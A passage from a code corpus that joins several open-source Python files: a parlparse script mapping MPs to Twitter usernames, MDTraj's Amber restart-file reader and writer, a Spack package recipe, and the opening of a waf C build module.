rows = csv.reader(lines.__iter__(), delimiter=',', quotechar='"')
class PeopleParser(xml.sax.handler.ContentHandler):
def __init__(self):
self.parser = xml.sax.make_parser()
self.parser.setContentHandler(self)
def parse(self,filename):
self.office_id_to_person_id = {}
self.parser.parse(filename)
def startElement(self,name,attrs):
if name == 'person':
self.current_person_id = attrs['id']
elif name == 'office':
self.office_id_to_person_id[attrs['id']] = self.current_person_id
def endElement(self,name):
if name == 'person':
self.current_person_id = None
people_parser = PeopleParser()
people_parser.parse("../members/people.xml")
person_id_to_twitter_username = {}
output_filename = "../members/twitter-commons.xml"
fp = open(output_filename,"w")
fp.write('''<?xml version="1.0" encoding="ISO-8859-1"?>
<publicwhip>
''')
for r in rows:
if len(r) < 5:
continue
member_id = r[2]
twitter_username = r[4]
if member_id == "url":
# That's the header line...
continue
if len(twitter_username) == 0:
continue
if member_id not in people_parser.office_id_to_person_id:
raise "No person ID found for %s in line %s" % (member_id,"#".join(r))
person_id = people_parser.office_id_to_person_id[member_id]
fp.write("<personinfo id=\"%s\" twitter_username=\"%s\"/>\n"%(person_id,twitter_username))
fp.write("</publicwhip>")
| henare/parlparse | pyscraper/gettwittermps.py | Python | agpl-3.0 | 1,744 |
##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2014 Stanford University and the Authors
#
# Authors: Jason Swails
# Contributors:
#
# This code for reading Amber restart and inpcrd files was taken from ParmEd,
# which is released under the GNU Lesser General Public License
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
"""
This module provides the ability to read Amber inpcrd/restart files as well as
Amber NetCDF restart files. This code was taken from ParmEd and simplified by
removing the functionality that is not needed.
"""
from __future__ import print_function, division
from distutils.version import StrictVersion
from math import ceil
import os
import warnings
import numpy as np
from mdtraj import version
from mdtraj.formats.registry import FormatRegistry
from mdtraj.utils import ensure_type, import_, in_units_of, cast_indices, six
__all__ = ['AmberRestartFile', 'load_restrt', 'AmberNetCDFRestartFile',
'load_ncrestrt']
range = six.moves.range
@FormatRegistry.register_loader('.rst7')
@FormatRegistry.register_loader('.restrt')
@FormatRegistry.register_loader('.inpcrd')
def load_restrt(filename, top=None, atom_indices=None):
"""Load an AMBER ASCII restart/inpcrd file. Since this file doesn't contain
information to specify the topology, you need to supply a topology
Parameters
----------
filename : str
name of the AMBER restart file
top : {str, Trajectory, Topology}
Pass in either the path to a file containing topology information (e.g.,
a PDB, an AMBER prmtop, or certain types of Trajectory objects) to
supply the necessary topology information that is not present in these
files
atom_indices : array_like, optional
If not None, then read only a subset of the atoms coordinates from the
file.
Returns
-------
trajectory : md.Trajectory
The resulting trajectory, as an md.Trajectory object
See Also
--------
mdtraj.AmberRestartFile : Low level interface to AMBER restart files
"""
from mdtraj.core.trajectory import _parse_topology
topology = _parse_topology(top)
atom_indices = cast_indices(atom_indices)
with AmberRestartFile(filename) as f:
return f.read_as_traj(topology, atom_indices=atom_indices)
@FormatRegistry.register_fileobject('.rst7')
@FormatRegistry.register_fileobject('.restrt')
@FormatRegistry.register_fileobject('.inpcrd')
class AmberRestartFile(object):
"""Interface for reading and writing AMBER ASCII restart files. This is a
file-like object, that supports both reading and writing depending on the
`mode` flag. It implements the context manager protocol, so you can also
use it with the python 'with' statement.
Parameters
----------
filename : str
The name of the file to open
mode : {'r', 'w'}, default='r'
The mode in which to open the file. Valid options are 'r' or 'w' for
'read' or 'write'
force_overwrite : bool, default=False
In write mode, if a file named `filename` already exists, clobber it and
overwrite it
See Also
--------
md.AmberNetCDFRestartFile : Low level interface to AMBER NetCDF-format
restart files
"""
distance_unit = 'angstroms'
def __init__(self, filename, mode='r', force_overwrite=True):
self._closed = True
self._mode = mode
self._filename = filename
if mode not in ('r', 'w'):
raise ValueError("mode must be one of ['r', 'w']")
if mode == 'w' and not force_overwrite and os.path.exists(filename):
raise IOError('"%s" already exists' % filename)
if mode == 'w':
self._needs_initialization = True
self._handle = open(filename, mode)
self._closed = False
elif mode == 'r':
with open(filename, mode) as f:
f.readline()
words = f.readline().split()
try:
self._n_atoms = int(words[0])
except (IndexError, ValueError):
raise TypeError('"%s" is not a recognized Amber restart' %
filename)
self._needs_initialization = False
else:
raise RuntimeError()
@property
def n_atoms(self):
self._validate_open()
if self._needs_initialization:
raise IOError('The file is uninitialized')
return self._n_atoms
@property
def n_frames(self):
return 1 # always 1 frame
def _validate_open(self):
if self._closed:
raise IOError('The file is closed.')
def _parse(self, lines):
""" Parses the file """
self._time = None
try:
words = lines[1].split()
self._n_atoms = natom = int(words[0])
except (IndexError, ValueError):
raise TypeError('not a recognized Amber restart')
time = None
if len(words) >= 2:
time = float(words[1])
lines_per_frame = int(ceil(natom / 2))
if len(lines) == lines_per_frame + 2:
hasbox = hasvels = False
elif natom in (1, 2) and len(lines) == 4:
# This is the _only_ case where line counting does not work -- there
# is either 1 or 2 atoms and there are 4 lines. The 1st 3 lines are
# the title, natom/time, and coordinates. The 4th are almost always
# velocities since it's hard to have a periodic system this small.
# However, velocities (which are scaled down by 20.445) have a ~0%
# chance of being 60+, so we can pretty easily tell if the last line
# has box dimensions and angles or velocities. I cannot envision a
# plausible scenario where the detection here will ever fail
line = lines[3]
if natom == 1:
tmp = [line[i:i+12] for i in range(0, 72, 12) if
line[i:i+12].strip()]
if len(tmp) == 3:
hasvels = True
hasbox = False
elif len(tmp) == 6:
hasbox = True
hasvels = False
else:
raise TypeError('not a recognized Amber restart')
else:
# Ambiguous case
tmp = [float(line[i:i+12]) >= 60.0 for i in range(0, 72, 12)]
if any(tmp):
hasbox = True
hasvels = False
else:
hasvels = True
hasbox = False
elif len(lines) == lines_per_frame + 3:
hasbox = True
hasvels = False
elif len(lines) == 2*lines_per_frame + 2:
hasbox = False
hasvels = True
elif len(lines) == 2*lines_per_frame + 3:
hasbox = hasvels = True
else:
raise TypeError('Badly formatted restart file. Has %d lines for '
'%d atoms' % (len(lines), natom))
coordinates = np.zeros((1, natom, 3))
if time is None:
time = np.zeros(1)
else:
time = np.asarray((time,))
# Fill the coordinates
for i in range(lines_per_frame):
line = lines[i+2] # Skip first two lines
i2 = i * 2
coordinates[0,i2,:] = [float(line[j:j+12]) for j in range(0,36,12)]
i2 += 1
if i2 < natom:
coordinates[0,i2,:] = [float(line[j:j+12]) for j in
range(36,72,12)]
if hasbox:
cell_lengths = np.zeros((1,3))
cell_angles = np.zeros((1,3))
line = lines[-1]
cell_lengths[0,:] = [float(line[i:i+12]) for i in range(0,36,12)]
cell_angles[0,:] = [float(line[i:i+12]) for i in range(36,72,12)]
else:
cell_lengths = cell_angles = None
return coordinates, time, cell_lengths, cell_angles
def read_as_traj(self, topology, atom_indices=None):
"""Read an AMBER ASCII restart file as a trajectory.
Parameters
----------
topology : Topology
The system topology
atom_indices : array_like, optional
If not none, then read only a subset of the atoms coordinates from the
file. This may be slightly slower than the standard read because it required
an extra copy, but will save memory.
Returns
-------
trajectory : Trajectory
A trajectory object with 1 frame created from the file.
"""
from mdtraj.core.trajectory import Trajectory
if atom_indices is not None:
topology = topology.subset(atom_indices)
xyz, time, cell_lengths, cell_angles = self.read(atom_indices=atom_indices)
xyz = in_units_of(xyz, self.distance_unit, Trajectory._distance_unit,
inplace=True)
cell_lengths = in_units_of(cell_lengths, self.distance_unit,
Trajectory._distance_unit, inplace=True)
return Trajectory(xyz=xyz, topology=topology, time=time,
unitcell_lengths=cell_lengths,
unitcell_angles=cell_angles)
def read(self, atom_indices=None):
"""Read data from an AMBER ASCII restart file
Parameters
----------
atom_indices : np.ndarray, dtype=int, optional
The specific indices of the atoms you'd like to retrieve. If not
supplied, all of the atoms will be retrieved.
Returns
-------
coordinates : np.ndarray, shape=(1, n_atoms, 3)
The cartesian coordinates of the atoms, in units of angstroms. These
files only ever contain 1 frame
time : np.ndarray, None
The time corresponding to the frame, in units of picoseconds, or
None if no time information is present
cell_lengths : np.ndarray, None
The lengths (a, b, c) of the unit cell for the frame in angstroms,
or None if the information is not present in the file
cell_angles : np.ndarray, None
The angles (\alpha, \beta, \gamma) defining the unit cell for each
frame, or None if the information is not present in the file.
"""
if self._mode != 'r':
raise IOError('The file was opened in mode=%s. Reading is not '
'allowed.' % self._mode)
with open(self._filename, 'r') as f:
lines = f.readlines()
coordinates, time, cell_lengths, cell_angles = self._parse(lines)
if atom_indices is not None:
atom_slice = ensure_type(atom_indices, dtype=np.int, ndim=1,
name='atom_indices', warn_on_cast=False)
if not np.all(atom_slice) >= 0:
raise ValueError('Entries in atom_slice must be >= 0')
coordinates = coordinates[:, atom_slice, :]
return coordinates, time, cell_lengths, cell_angles
def write(self, coordinates, time=None, cell_lengths=None,
cell_angles=None):
"""Write one frame of a MD trajectory to disk in the AMBER ASCII restart
file format.
Parameters
----------
coordinates : np.ndarray, dtype=np.float32, shape=([1,] n_atoms, 3)
The cartesian coordinates of each atom, in units of angstroms. Must
be only a single frame (shape can be (1,N,3) or (N,3) where N is
the number of atoms)
time : array-like with 1 element or float, optional
The time corresponding to this frame. If not specified, a place
holder of 0 will be written
cell_lengths : np.ndarray, dtype=np.double, shape=([1,] 3)
The lengths (a,b,c) of the unit cell for the frame in Angstroms
cell_angles : np.ndarray, dtype=np.double, shape=([1,] 3)
The angles between the unit cell vectors for the frame in Degrees
"""
if self._mode != 'w':
raise IOError('The file was opened in mode=%s. Writing not allowed.'
% self._mode)
if not self._needs_initialization:
# Must have already been written -- can only write once
raise RuntimeError('restart file has already been written -- can '
'only write one frame to restart files.')
# These are no-ops.
# coordinates = in_units_of(coordinates, None, 'angstroms')
# time = in_units_of(time, None, 'picoseconds')
# cell_lengths = in_units_of(cell_lengths, None, 'angstroms')
# cell_angles = in_units_of(cell_angles, None, 'degrees')
# typecheck all of the input arguments rigorously
coordinates = ensure_type(coordinates, np.float32, 3, 'coordinates',
length=None, can_be_none=False,
shape=(1,None,3), warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
n_frames, self._n_atoms = coordinates.shape[0], coordinates.shape[1]
if n_frames != 1:
raise ValueError('Can only write 1 frame to a restart file!')
if time is not None:
try:
time = float(time)
except TypeError:
raise TypeError('Can only provide a single time')
else:
time = 0.0
cell_lengths = ensure_type(cell_lengths, np.float64, 2, 'cell_lengths',
length=1, can_be_none=True,
warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
cell_angles = ensure_type(cell_angles, np.float64, 2, 'cell_angles',
length=1, can_be_none=True,
warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
if ((cell_lengths is None and cell_angles is not None) or
(cell_lengths is not None and cell_angles is None)):
prov, negl = 'cell_lengths', 'cell_angles'
if cell_lengths is None:
prov, negl = negl, prov
raise ValueError('You provided the variable "%s" but did not '
'provide "%s". Either provide both or neither -- '
'one without the other is meaningless.' %
(prov, negl))
self._handle.write('Amber restart file (without velocities) written by '
'MDTraj\n')
self._handle.write('%5d%15.7e\n' % (self._n_atoms, time))
fmt = '%12.7f%12.7f%12.7f'
for i in range(self._n_atoms):
acor = coordinates[0, i, :]
self._handle.write(fmt % (acor[0], acor[1], acor[2]))
if i % 2 == 1: self._handle.write('\n')
if self._n_atoms % 2 == 1: self._handle.write('\n')
if cell_lengths is not None:
self._handle.write(fmt % (cell_lengths[0,0], cell_lengths[0,1],
cell_lengths[0,2]))
self._handle.write(fmt % (cell_angles[0,0], cell_angles[0,1],
cell_angles[0,2]) + '\n')
self._handle.flush()
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def close(self):
if not self._closed and hasattr(self, '_handle'):
self._handle.close()
self._closed = True
def __del__(self):
self.close()
def __len__(self):
return 1 # All restarts have only 1 frame
@FormatRegistry.register_loader('.ncrst')
def load_ncrestrt(filename, top=None, atom_indices=None):
"""Load an AMBER NetCDF restart/inpcrd file. Since this file doesn't
contain information to specify the topology, you need to supply a topology
Parameters
----------
filename : str
name of the AMBER restart file
top : {str, Trajectory, Topology}
Pass in either the path to a file containing topology information (e.g.,
a PDB, an AMBER prmtop, or certain types of Trajectory objects) to
supply the necessary topology information that is not present in these
files
atom_indices : array_like, optional
If not None, then read only a subset of the atoms coordinates from the
file.
Returns
-------
trajectory : md.Trajectory
The resulting trajectory, as an md.Trajectory object
See Also
--------
mdtraj.AmberRestartFile : Low level interface to AMBER restart files
"""
from mdtraj.core.trajectory import _parse_topology
topology = _parse_topology(top)
atom_indices = cast_indices(atom_indices)
with AmberNetCDFRestartFile(filename) as f:
return f.read_as_traj(topology, atom_indices=atom_indices)
@FormatRegistry.register_fileobject('.ncrst')
class AmberNetCDFRestartFile(object):
"""Interface for reading and writing AMBER NetCDF files. This is a file-like
object, that supports both reading and writing depending on the `mode` flag.
It implements the context manager protocol, so you can also use it with the
python 'with' statement.
Parameters
----------
filename : str
The name of the file to open
mode : {'r', 'w'}, default='r'
The mode in which to open the file. Valid options are 'r' or 'w' for
'read' or 'write'
force_overwrite : bool, default=False
In write mode, if a file named `filename` already exists, clobber it and
overwrite it
"""
distance_unit = 'angstroms'
def __init__(self, filename, mode='r', force_overwrite=False):
self._closed = True
self._mode = mode
if StrictVersion(import_('scipy.version').short_version) < StrictVersion('0.12.0'):
raise ImportError('MDTraj NetCDF support requires scipy>=0.12.0. '
'You have %s' % import_('scipy.version').short_version)
netcdf = import_('scipy.io').netcdf_file
if mode not in ('r', 'w'):
raise ValueError("mode must be one of ['r', 'w']")
if mode == 'w' and not force_overwrite and os.path.exists(filename):
raise IOError('"%s" already exists' % filename)
# AMBER uses the NetCDF3 format, with 64 bit encodings, which for
# scipy.io.netcdf_file is "version=2"
self._handle = netcdf(filename, mode=mode, version=2)
self._closed = False
if mode == 'w':
self._needs_initialization = True
elif mode == 'r':
self._needs_initialization = False
else:
raise RuntimeError()
@property
def n_atoms(self):
self._validate_open()
if self._needs_initialization:
raise IOError('The file is uninitialized')
return self._handle.dimensions['atom']
@property
def n_frames(self):
return 1 # always 1 frame
def _validate_open(self):
if self._closed:
raise IOError('The file is closed.')
def read_as_traj(self, topology, atom_indices=None):
"""Read an AMBER ASCII restart file as a trajectory.
Parameters
----------
topology : Topology
The system topology
atom_indices : array_like, optional
If not none, then read only a subset of the atoms coordinates from the
file. This may be slightly slower than the standard read because it required
an extra copy, but will save memory.
Returns
-------
trajectory : Trajectory
A trajectory object with 1 frame created from the file.
"""
from mdtraj.core.trajectory import Trajectory
if atom_indices is not None:
topology = topology.subset(atom_indices)
xyz, time, cell_lengths, cell_angles = self.read(atom_indices=atom_indices)
xyz = in_units_of(xyz, self.distance_unit, Trajectory._distance_unit,
inplace=True)
cell_lengths = in_units_of(cell_lengths, self.distance_unit,
Trajectory._distance_unit, inplace=True)
return Trajectory(xyz=xyz, topology=topology, time=time,
unitcell_lengths=cell_lengths,
unitcell_angles=cell_angles)
def read(self, atom_indices=None):
"""Read data from an AMBER NetCDF restart file
Parameters
----------
atom_indices : np.ndarray, dtype=int, optional
The specific indices of the atoms you'd like to retrieve. If not
supplied, all of the atoms will be retrieved.
Returns
-------
coordinates : np.ndarray, shape=(1, n_atoms, 3)
The cartesian coordinates of the atoms, in units of angstroms. These
files only ever contain 1 frame
time : np.ndarray, None
The time corresponding to the frame, in units of picoseconds, or
None if no time information is present
cell_lengths : np.ndarray, None
The lengths (a, b, c) of the unit cell for the frame in angstroms,
or None if the information is not present in the file
cell_angles : np.ndarray, None
The angles (\alpha, \beta, \gamma) defining the unit cell for each
frame, or None if the information is not present in the file.
Notes
-----
If the file is not a NetCDF file with the appropriate convention, a
TypeError is raised. If variables that are needed do not exist or if
illegal values are passed in for parameters, ValueError is raised. If
I/O errors occur, IOError is raised.
"""
if self._mode != 'r':
raise IOError('The file was opened in mode=%s. Reading is not '
'allowed.' % self._mode)
if 'coordinates' not in self._handle.variables:
raise ValueError('No coordinates found in the NetCDF file.')
# Check that conventions are correct
try:
conventions = self._handle.Conventions.decode('ascii')
except UnicodeDecodeError:
raise TypeError('NetCDF file does not have correct Conventions')
try:
convention_version = self._handle.ConventionVersion.decode('ascii')
except UnicodeDecodeError:
raise ValueError('NetCDF file does not have correct ConventionVersion')
except AttributeError:
raise TypeError('NetCDF file does not have ConventionVersion')
if (not hasattr(self._handle, 'Conventions') or
conventions != 'AMBERRESTART'):
raise TypeError('NetCDF file does not have correct Conventions')
if convention_version != '1.0':
raise ValueError('NetCDF restart has ConventionVersion %s. Only '
'Version 1.0 is supported.' % convention_version)
if atom_indices is not None:
atom_slice = ensure_type(atom_indices, dtype=np.int, ndim=1,
name='atom_indices', warn_on_cast=False)
if not np.all(atom_slice) >= 0:
raise ValueError('Entries in atom_slice must be >= 0')
coordinates = self._handle.variables['coordinates'][atom_slice, :]
else:
coordinates = self._handle.variables['coordinates'][:, :]
# Get unit cell parameters
if 'cell_lengths' in self._handle.variables:
cell_lengths = self._handle.variables['cell_lengths'][:]
else:
cell_lengths = None
if 'cell_angles' in self._handle.variables:
cell_angles = self._handle.variables['cell_angles'][:]
else:
cell_angles = None
if cell_lengths is None and cell_angles is not None:
warnings.warn('cell_lengths were found, but no cell_angles')
if cell_lengths is not None and cell_angles is None:
warnings.warn('cell_angles were found, but no cell_lengths')
if 'time' in self._handle.variables:
time = self._handle.variables['time'].getValue()
else:
time = None
# scipy.io.netcdf variables are mem-mapped, and are only backed by valid
# memory while the file handle is open. This is _bad_ because we need to
# support the user opening the file, reading the coordinates, and then
# closing it, and still having the coordinates be a valid memory
# segment.
# https://github.com/mdtraj/mdtraj/issues/440
if coordinates is not None and not coordinates.flags['WRITEABLE']:
coordinates = np.array(coordinates, copy=True)
if cell_lengths is not None and not cell_lengths.flags['WRITEABLE']:
cell_lengths = np.array(cell_lengths, copy=True)
if cell_angles is not None and not cell_angles.flags['WRITEABLE']:
cell_angles = np.array(cell_angles, copy=True)
# The leading frame dimension is missing on all of these arrays since
# restart files have only one frame. Reshape them to add this extra
# dimension
coordinates = coordinates[np.newaxis,:]
if cell_lengths is not None:
cell_lengths = cell_lengths[np.newaxis,:]
if cell_angles is not None:
cell_angles = cell_angles[np.newaxis,:]
if time is not None:
time = np.asarray([time,])
return coordinates, time, cell_lengths, cell_angles
def write(self, coordinates, time=None, cell_lengths=None,
cell_angles=None):
"""Write one frame of a MD trajectory to disk in the AMBER NetCDF
restart file format.
Parameters
----------
coordinates : np.ndarray, dtype=np.float32, shape=([1,] n_atoms, 3)
The cartesian coordinates of each atom, in units of angstroms. Must
be only a single frame (shape can be (1,N,3) or (N,3) where N is
the number of atoms)
time : array-like with 1 element or float, optional
The time corresponding to this frame. If not specified, a place
holder of 0 will be written
cell_lengths : np.ndarray, dtype=np.double, shape=([1,] 3)
The lengths (a,b,c) of the unit cell for the frame in Angstroms
cell_angles : np.ndarray, dtype=np.double, shape=([1,] 3)
The angles between the unit cell vectors for the frame in Degrees
Notes
-----
You must only have one frame to write to this file.
"""
if self._mode != 'w':
raise IOError('The file was opened in mode=%s. Writing not allowed.'
% self._mode)
if not self._needs_initialization:
# Must have already been written -- can only write once
raise RuntimeError('NetCDF restart file has already been written '
'-- can only write one frame to restart files.')
# these are no-ops
# coordinates = in_units_of(coordinates, None, 'angstroms')
# time = in_units_of(time, None, 'picoseconds')
# cell_lengths = in_units_of(cell_lengths, None, 'angstroms')
# cell_angles = in_units_of(cell_angles, None, 'degrees')
# typecheck all of the input arguments rigorously
coordinates = ensure_type(coordinates, np.float32, 3, 'coordinates',
length=None, can_be_none=False,
shape=(1,None,3), warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
n_frames, n_atoms = coordinates.shape[0], coordinates.shape[1]
if n_frames != 1:
raise ValueError('Can only write 1 frame to a restart file!')
if time is not None:
try:
time = float(time)
except TypeError:
raise TypeError('Can only provide a single time')
else:
time = 0.0
cell_lengths = ensure_type(cell_lengths, np.float64, 2, 'cell_lengths',
length=1, can_be_none=True,
warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
cell_angles = ensure_type(cell_angles, np.float64, 2, 'cell_angles',
length=1, can_be_none=True,
warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
if ((cell_lengths is None and cell_angles is not None) or
(cell_lengths is not None and cell_angles is None)):
prov, negl = 'cell_lengths', 'cell_angles'
if cell_lengths is None:
prov, negl = negl, prov
raise ValueError('You provided the variable "%s" but did not '
'provide "%s". Either provide both or neither -- '
'one without the other is meaningless.' %
(prov, negl))
self._initialize_headers(n_atoms=n_atoms,
set_coordinates=True,
set_time=(time is not None),
set_cell=(cell_lengths is not None))
self._needs_initialization = False
# Write the time, coordinates, and box info
if time is not None:
self._handle.variables['time'][0] = float(time)
self._handle.variables['coordinates'][:,:] = coordinates[0,:,:]
if cell_lengths is not None:
self._handle.variables['cell_angles'][:] = cell_angles[0,:]
self._handle.variables['cell_lengths'][:] = cell_lengths[0,:]
self.flush()
def _initialize_headers(self, n_atoms, set_coordinates, set_time, set_cell):
"""Initialize the headers and convention properties of the NetCDF
restart file
"""
ncfile = self._handle
ncfile.Conventions = 'AMBERRESTART'
ncfile.ConventionVersion = "1.0"
ncfile.title = 'NetCDF Restart file written by MDTraj w/out velocities'
ncfile.application = 'Omnia'
ncfile.program = 'MDTraj'
ncfile.programVersion = version.short_version
# Dimensions
ncfile.createDimension('spatial', 3)
ncfile.createDimension('atom', n_atoms)
if set_cell:
ncfile.createDimension('cell_spatial', 3)
ncfile.createDimension('label', 5)
ncfile.createDimension('cell_angular', 3)
if set_time:
ncfile.createDimension('time', 1)
# Variables
v = ncfile.createVariable('spatial', 'c', ('spatial',))
v[:] = np.asarray(list('xyz'))
v = ncfile.createVariable('coordinates', 'd', ('atom', 'spatial'))
v.units = 'angstrom'
if set_cell:
v = ncfile.createVariable('cell_angular', 'c',
('cell_angular', 'label'))
v[0] = np.asarray(list('alpha'))
v[1] = np.asarray(list('beta '))
v[2] = np.asarray(list('gamma'))
v = ncfile.createVariable('cell_spatial', 'c', ('cell_spatial',))
v[:] = np.asarray(list('abc'))
v = ncfile.createVariable('cell_lengths', 'd', ('cell_spatial',))
v.units = 'angstrom'
v = ncfile.createVariable('cell_angles', 'd', ('cell_angular',))
v.units = 'degree'
if set_time:
v = ncfile.createVariable('time', 'd', ('time',))
v.units = 'picoseconds'
self.flush()
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def close(self):
if not self._closed and hasattr(self, '_handle'):
self._handle.close()
self._closed = True
def __del__(self):
self.close()
def __len__(self):
return 1 # All restarts have only 1 frame
def flush(self):
self._validate_open()
if self._mode != 'w':
raise IOError('Cannot flush a file opened for reading')
self._handle.flush()
| ctk3b/mdtraj | mdtraj/formats/amberrst.py | Python | lgpl-2.1 | 33,272 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PySphinxcontribProgramoutput(PythonPackage):
"""A Sphinx extension to literally insert the output of arbitrary commands
into documents, helping you to keep your command examples up to date."""
homepage = "https://sphinxcontrib-programoutput.readthedocs.org/"
url = "https://pypi.io/packages/source/s/sphinxcontrib-programoutput/sphinxcontrib-programoutput-0.10.tar.gz"
# FIXME: These import tests don't work for some reason
# import_modules = ['sphinxcontrib', 'sphinxcontrib.programoutput']
version('0.10', '8e511e476c67696c7ae2c08b15644eb4')
depends_on('py-setuptools', type='build')
depends_on('py-sphinx@1.3.5:', type=('build', 'run'))
| wscullin/spack | var/spack/repos/builtin/packages/py-sphinxcontrib-programoutput/package.py | Python | lgpl-2.1 | 1,947 |
#! /usr/bin/env python
# encoding: utf-8
import os,sys,re
import TaskGen,Task,Utils,preproc,Logs,Build,Options
from Logs import error,debug,warn
from Utils import md5
from TaskGen import taskgen,after,before,feature
from Constants import*
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
import config_c
USE_TOP_LEVEL=False
win_platform=sys.platform in('win32','cygwin')
def get_cc_version(conf,cc,gcc=False,icc=False):
cmd=cc+['-dM','-E','-']
try:
p=Utils.pproc.Popen(cmd,stdin=Utils.pproc.PIPE,stdout=Utils.pproc.PIPE,stderr=Utils.pproc.PIPE)
p.stdin.write('\n')
out=p.communicate()[0]
except:
conf.fatal('could not determine the compiler version %r'%cmd)
out=str(out)
if gcc:
if out.find('__INTEL_COMPILER')>=0:
conf.fatal('The intel compiler pretends to be gcc')
if out.find('__GNUC__')<0:
conf.fatal('Could not determine the compiler type')
if icc and out.find('__INTEL_COMPILER')<0:
conf.fatal('Not icc/icpc')
k={}
if icc or gcc:
out=out.split('\n')
import shlex
for line in out:
lst=shlex.split(line)
if len(lst)>2:
key=lst[1]
val=lst[2]
k[key]=val
conf.env['CC_VERSION']=(k['__GNUC__'],k['__GNUC_MINOR__'],k['__GNUC_PATCHLEVEL__'])
return k
class DEBUG_LEVELS:
ULTRADEBUG="ultradebug"
DEBUG="debug"
RELEASE="release"
OPTIMIZED="optimized"
CUSTOM="custom"
ALL=[ULTRADEBUG,DEBUG,RELEASE,OPTIMIZED,CUSTOM]
def scan(self):
debug('ccroot: _scan_preprocessor(self, node, env, path_lst)')
if len(self.inputs)==1:
node=self.inputs[0]
(nodes,names)=preproc.get_deps(node,self.env,nodepaths=self.env['INC_PATHS'])
if Logs.verbose:
debug('deps: deps for %s: %r; unresolved %r'%(str(node),nodes,names))
return(nodes,names)
all_nodes=[]
all_names=[]
seen=[]
for node in self.inputs:
(nodes,names)=preproc.get_deps(node,self.env,nodepaths=self.env['INC_PATHS'])
if Logs.verbose:
debug('deps: deps for %s: %r; unresolved %r'%(str(node),nodes,names))
for x in nodes:
if id(x)in seen:continue
seen.append(id(x))
all_nodes.append(x)
for x in names:
if not x in all_names:
all_names.append(x)
return(all_nodes,all_names)
class ccroot_abstract(TaskGen.task_gen):
def __init__(self,*k,**kw):
if len(k)>1:
k=list(k)
if k[1][0]!='c':
k[1]='c'+k[1]
TaskGen.task_gen.__init__(self,*k,**kw)
def get_target_name(self):
tp='program'
for x in self.features:
if x in['cshlib','cstaticlib']:
tp=x.lstrip('c')
pattern=self.env[tp+'_PATTERN']
if not pattern:pattern='%s'
dir,name=os.path.split(self.target)
if win_platform and getattr(self,'vnum','')and'cshlib'in self.features:
name=name+'-'+self.vnum.split('.')[0]
return os.path.join(dir,pattern%name)
def install_implib(self):
bld=self.outputs[0].__class__.bld
bindir=self.install_path
if not len(self.outputs)==2:
raise ValueError('fail')
dll=self.outputs[0]
bld.install_as(bindir+os.sep+dll.name,dll.abspath(self.env),chmod=self.chmod,env=self.env)
implib=self.outputs[1]
libdir='${LIBDIR}'
if not self.env['LIBDIR']:
libdir='${PREFIX}/lib'
if sys.platform=='cygwin':
bld.symlink_as(libdir+'/'+implib.name,bindir+os.sep+dll.name,env=self.env)
else:
bld.install_as(libdir+'/'+implib.name,implib.abspath(self.env),env=self.env)
def install_shlib(self):
bld=self.outputs[0].__class__.bld
nums=self.vnum.split('.')
path=self.install_path
if not path:return
libname=self.outputs[0].name
name3=libname+'.'+self.vnum
name2=libname+'.'+nums[0]
name1=libname
filename=self.outputs[0].abspath(self.env)
bld.install_as(os.path.join(path,name3),filename,env=self.env)
bld.symlink_as(os.path.join(path,name2),name3)
bld.symlink_as(os.path.join(path,name1),name3)
def default_cc(self):
Utils.def_attrs(self,includes='',defines='',rpaths='',uselib='',uselib_local='',add_objects='',p_flag_vars=[],p_type_vars=[],compiled_tasks=[],link_task=None)
def apply_verif(self):
if not(self.source or getattr(self,'add_objects',None)):
raise Utils.WafError('no source files specified for %s'%self)
if not self.target:
raise Utils.WafError('no target for %s'%self)
def vars_target_cprogram(self):
self.default_install_path=self.env['BINDIR']or'${PREFIX}/bin'
self.default_chmod=O755
def vars_target_cstaticlib(self):
self.default_install_path=self.env['LIBDIR']or'${PREFIX}/lib${LIB_EXT}'
def vars_target_cshlib(self):
if win_platform:
self.default_install_path=self.env['BINDIR']or'${PREFIX}/bin'
self.default_chmod=O755
else:
self.default_install_path=self.env['LIBDIR']or'${PREFIX}/lib${LIB_EXT}'
def install_target_cstaticlib(self):
if not self.bld.is_install:return
self.link_task.install_path=self.install_path
def install_target_cshlib(self):
if getattr(self,'vnum','')and not win_platform:
self.link_task.vnum=self.vnum
self.link_task.install=install_shlib
def apply_incpaths(self):
lst=[]
for lib in self.to_list(self.uselib):
for path in self.env['CPPPATH_'+lib]:
if not path in lst:
lst.append(path)
if preproc.go_absolute:
for path in preproc.standard_includes:
if not path in lst:
lst.append(path)
for path in self.to_list(self.includes):
if not path in lst:
if preproc.go_absolute or not os.path.isabs(path):
lst.append(path)
else:
self.env.prepend_value('CPPPATH',path)
for path in lst:
node=None
if os.path.isabs(path):
